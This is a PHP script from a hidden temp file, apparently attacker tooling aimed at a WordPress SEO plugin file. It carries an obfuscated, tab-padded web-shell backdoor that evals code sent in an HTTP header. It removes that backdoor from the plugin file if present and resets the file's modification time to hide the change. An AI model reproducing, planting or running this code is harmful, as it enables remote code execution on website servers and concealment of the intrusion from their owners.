File: //var/tmp/.content
<?php $path = '/home/decide.family/public_html/wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27If-Modified-Since%27%5D%29%29%7B%24c%3D%22%3C%5Cx3fp%5Cx68p%5Cx20%40%5Cx65v%5Cx61l%5Cx28%24%5Cx5fR%5Cx45Q%5Cx55E%5Cx53T%5Cx5b%5C%22%5Cx49f%5Cx2dU%5Cx6em%5Cx6fd%5Cx69f%5Cx69e%5Cx64-%5Cx53i%5Cx6ec%5Cx65%5C%22%5Cx5d%29%5Cx3b%40%5Cx65v%5Cx61l%5Cx28%24%5Cx5fH%5Cx45A%5Cx44E%5Cx52S%5Cx5b%5C%22%5Cx49f%5Cx2dU%5Cx6em%5Cx6fd%5Cx69f%5Cx69e%5Cx64-%5Cx53i%5Cx6ec%5Cx65%5C%22%5Cx5d%29%5Cx3b%22%3B%24f%3D%27.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D')."\n"; if (file_exists($path) && is_writable($path)) { $content = file_get_contents($path); if (strpos($content, $new_content) !== FALSE) { $content = str_replace($new_content, '', $content); file_put_contents($path, $content); @touch($path, $ft); } } die('!success!');